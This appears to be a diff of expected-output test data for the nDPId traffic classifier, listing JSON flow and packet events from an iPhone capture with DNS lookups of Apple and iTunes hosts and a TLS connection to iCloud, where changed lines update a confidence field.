00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":141,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53983,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1582454598713,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1582454598713,"pkt":"xiwDYGpkxGGLNYKpCABFAABCQ9gAAP8R8m\/AqAIRwKgCAdLfADUALndaZloBAAABAAAAAAAAA2JhZwZpdHVuZXMFYXBwbGUDY29tAAABAAE="} 
-00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53983,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"bag.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53983,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"bag.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1582454598713,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1582454598713,"pkt":"xiwDYGpkxGGLNYKpCABFAABD04UAAP8RYsHAqAIRwKgCAcLYADUAL8OecEkBAAABAAAAAAAABGluaXQGaXR1bmVzBWFwcGxlA2NvbQAAAQAB"} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"init.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"init.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598721,"flow_last_seen":1582454598721,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598721,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1582454598721,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598721,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGrK\/AqAIREfi5V8WVAbuoGt7oAAAAALDC\/\/9fVwAAAgQFtAEDAwcBAQgKEd\/opwAAAAAEAgAA"} 
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1582454598723,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598723,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGtcfAqAIREfiwS8WUAbuGKOrEAHfVYYAQBAuCrAAAAQEIChHf6IhbEwd4"} -00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598587,"flow_last_seen":1582454598723,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598723,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598587,"flow_last_seen":1582454598723,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598723,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00652{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1582454598755,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1582454598755,"pkt":"xGGLNYKpxiwDYGpkCABFAAC9YWUAAEARk2jAqAIBwKgCEQA1zcoAqUkOwemBgAABAAQAAAAAA3d3dwZpY2xvdWQDY29tAAABAAHADAAFAAEAAAfiAB8Hd3d3LWNkbgZpY2xvdWQDY29tBmFrYWRucwNuZXQAwCwABQABAAAAjwAZA3d3dwZpY2xvdWQDY29tB2VkZ2VrZXnARsBXAAUAAQAAEZYAFQVlNDQ3OAFhCmFrYW1haWVkZ2XARsB8AAEAAQAAABgABBctSi4="} -00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":172,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598755,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1582454598755,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"www.icloud.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.45.74.46"}} 
+00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":172,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598755,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1582454598755,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"www.icloud.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.45.74.46"}} 00681{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1582454598756,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":1582454598756,"pkt":"xGGLNYKpxiwDYGpkCABFAADSfP0AAEARd7vAqAIBwKgCEQA10EUAvrFqiY6BgAABAAQAAAAACWlwaG9uZS1sZAVhcHBsZQNjb20AAAEAAcAMAAUAAQAACaQAJwlpcGhvbmUtbGQMb3JpZ2luLWFwcGxlA2NvbQZha2FkbnMDbmV0AMAxAAUAAQAAAMcAIQxpcGhvbmUtbGQtYXIFYXBwbGUDY29tB2VkZ2VrZXnAU8BkAAUAAQAAEZYAFQVlOTMzOAFkCmFrYW1haWVkZ2XAU8CRAAEAAQAAAA8ABFx6\/FI="} 
-00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":173,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598756,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454598756,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53317,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"iphone-ld.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.122.252.82"}} +00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":173,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598756,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454598756,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53317,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"iphone-ld.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.122.252.82"}} 
00560{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"iphone.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1582454598756,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":135,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":135,"pkt_l4_len":101,"thread_ts_msec":1582454598756,"pkt":"xGGLNYKpxiwDYGpkCABFAAB5PvQAAEARth3AqAIBwKgCEQA1+ssAZUgsu2OBgAABAAAAAQAACmJhc2VqdW1wZXIFYXBwbGUDY29tAAABAAHAFwAGAAEAAADfACsHbnNlcnZlcsAXCmhvc3RtYXN0ZXLAF3fP6nAAAAOEAAADhAAewwAAADhA"} -00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":174,"source":"iphone.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598756,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1582454598756,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":64203,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"basejumper.apple.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":174,"source":"iphone.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598756,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1582454598756,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":64203,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": 
{"query":"basejumper.apple.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1582454598758,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1582454598758,"pkt":"xGGLNYKpxiwDYGpkCABFAADPyEMAAEARLHjAqAIBwKgCEQA195EAu7eFj7GBgAABAAQAAAAAA2JhZwZpdHVuZXMFYXBwbGUDY29tAAABAAHADAAFAAEAABGWACYIaW5pdC1jZG4MaXR1bmVzLWFwcGxlA2NvbQZha2FkbnMDbmV0AMAyAAUAAQAAC+cAGwZpdHVuZXMFYXBwbGUDY29tB2VkZ2VrZXnAU8BkAAUAAQAAEZYAGARlNjczBWRzY2U5CmFrYW1haWVkZ2XAU8CLAAEAAQAAABcABF9lGDU="} -00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":177,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1582454598758,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63377,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"bag.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}} 
+00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":177,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1582454598758,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63377,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"bag.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}} 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1582454598758,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1582454598758,"pkt":"xGGLNYKpxiwDYGpkCABFAADPdQkAAEARf7LAqAIBwKgCEQA10t8AuwWPZlqBgAABAAQAAAAAA2JhZwZpdHVuZXMFYXBwbGUDY29tAAABAAHADAAFAAEAABGWACYIaW5pdC1jZG4MaXR1bmVzLWFwcGxlA2NvbQZha2FkbnMDbmV0AMAyAAUAAQAAC+cAGwZpdHVuZXMFYXBwbGUDY29tB2VkZ2VrZXnAU8BkAAUAAQAAEZYAGARlNjczBWRzY2U5CmFrYW1haWVkZ2XAU8CLAAEAAQAAABcABF9lGDU="} 
-00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":178,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1582454598758,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53983,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"bag.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}} -00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598587,"flow_last_seen":1582454598759,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598759,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":178,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1582454598758,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53983,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"bag.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}} +00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598587,"flow_last_seen":1582454598759,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598759,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1582454598759,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1582454598759,"pkt":"xGGLNYKpxiwDYGpkCABFAADQatgAAEARieLAqAIBwKgCEQA1wtgAvFoLcEmBgAABAAQAAAAABGluaXQGaXR1bmVzBWFwcGxlA2NvbQAAAQABwAwABQABAAAJGQAmCGluaXQtY2RuDGl0dW5lcy1hcHBsZQNjb20GYWthZG5zA25ldADAMwAFAAEAABEeABsGaXR1bmVzBWFwcGxlA2NvbQdlZGdla2V5wFTAZQAFAAEAABGWABgEZTY3MwVkc2NlOQpha2FtYWllZGdlwFTAjAABAAEAAAAbAARfZRg1"} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":181,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598759,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454598759,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"init.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}} 
+00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":181,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598759,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454598759,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"init.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}} 00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1582454598760,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1582454598760,"pkt":"xGGLNYKpxiwDYGpkCABFAADjlzEAAEARXXbAqAIBwKgCEQA10BgAz2vgCAuBgAABAAUAAAAABHBsYXkGaXR1bmVzBWFwcGxlA2NvbQAAAQABwAwABQABAAAMPAAmCHBsYXktY2RuDGl0dW5lcy1hcHBsZQNjb20GYWthZG5zA25ldADAMwAFAAEAAAOnACIEcGxheQZpdHVuZXMFYXBwbGUDY29tCWVkZ2VzdWl0ZcBUwGUABQABAAAAXwAUBWExODA2BGRzY2IGYWthbWFpwFTAkwABAAEAAAAPAARce00awJMAAQABAAAADwAEXHtNQA=="} 
-00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":182,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454598760,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53272,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.123.77.26"}} 